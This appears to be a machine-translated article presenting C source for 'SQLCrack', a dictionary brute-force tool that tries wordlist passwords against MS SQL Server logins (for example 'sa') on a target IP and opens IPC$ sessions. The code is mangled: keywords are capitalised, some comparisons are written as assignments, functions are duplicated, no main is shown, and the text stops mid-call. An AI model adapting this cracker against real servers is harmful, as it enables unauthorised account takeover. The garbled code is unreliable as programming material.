This article focuses on how to detect the password of the ms SQL SERVER account. The following example describes the entire process of password detection.
// Header file used by the program
// Define global variables
Char dict [20000] [40], // The password to be tested
UserName [40], // User Name
Target [40], // target server
Passwd [40]; // the correct password that has been detected
Int total = 0; // number of words in the dictionary
BOOL Cracked = FALSE; // This value is TRUE when the password is successfully tested.
//
// Function: usage
// Function: displays program help information.
//
Void usage ()
{
Printf ("\ nPower by analyzer <〈
[Email] inmiao@163.com [/email]
> 〉"
"\ Nhttp: // www.infocn.com"
"\ NUsage: SQLCrack <ip> <UserName> <dict> <SleepTime [20-1000]>"
"\ NExample: SQLCrack 192.168.0.1 sa c: \ pwd. dic 50 \ n"); return;
}
//
// Function: ReadDic
// Function: read data from the dictionary file, pass it to the global variable dict, and prepare the Test password.
// Description: If the function fails to run, return 1. If the function succeeds, return 0.
//
Int ReadDic (char * dic)
{
FILE * fp;
Char tmp [40];
// Open the dictionary file
If (fp = fopen (dic, "r") = NULL)
{
Printf ("\ nCaN' t open % s ", dic );
Return 1;
}
While (! Feof (fp ))
{
// Read data to temporary variables
If (fgets (tmp, 40, fp) = NULL)
Break;
// Do not forget to remove the last data read from the file from the [line feed symbol]. Otherwise, the password will not be detected.
Strncpy (dict [total], tmp, strlen (tmp)-1 );
Total ++;
// Because dict is defined as dict [20000] [40], if the number of words in the dictionary exceeds 20000, the loop is exited.
// Otherwise it will overflow. you can adjust it on your own
If (total> = 20000)
Break;
}
Fclose (fp );
Return 0;
}
//
// Function: ConnIPC
// Function: Establish an IPC connection
// Description: return value 1 for connection failure and return value 0 for success
//
Int ConnIPC (char * RemoteName)
{
NETRESOURCE nr;
DWORD flags = CONNECT_UPDATE _PROFILE;
Tchar rn [30] = "",
LN [5] = "";
Strcat (RN, RemoteName );
Strcat (RN, "\ ipc $ ");
// Fill in the Data Structure
Nr. dwType = RESOURCETYPE_DISK;
Nr. lpLocalName = (LPTSTR) & LN;
Nr. lpRemoteName = (LPTSTR) & RN;
Nr. lpProvider = NULL;
If (WNetAddConnection2 (& nr, (LPSTR) "", (LPSTR) "", flags) = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $ ");
Ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
DWORD WINAPI SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value SCHAR ConnStr [200]; // connectionDatabaseString
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS)
{
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof
(SzBuffer), & swStrLen,
SQL _DRIVER_COMPLETE_REQUIRED );
// Printf ("conn ..");
If (retcode! = SQL _SUCCESS & retcode! = SQL _SUCCESS_WITH_INFO)
{
// Connection failed and function terminated
// Printf ("\ nCouldn't connect to % s MSSQL server. \ n", target );
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// The remote MSSQL Server database is successfully connected.
Cracked = TRUE;
Strcpy (passwd, pwd );
// Puts (szBuffer );
// Display the string connecting to the remote database
// Disconnect
SQLDisconnect (hdbc );
// Printf ("disconn ..");
// Release the connection handle
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
// Printf ("free hdbc ..");
// Release the environment handle
SQLFreeHandle (SQL _HANDLE_ENV, henv );
// Printf ("free henv .. \ n ");
Return 0;
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE,
TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
Dword winapi SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value
SCHAR ConnStr [200]; // connection string
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS ){
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr ),
SzBuffer, sizeof (szBuffer ),&
Source: jieshiwang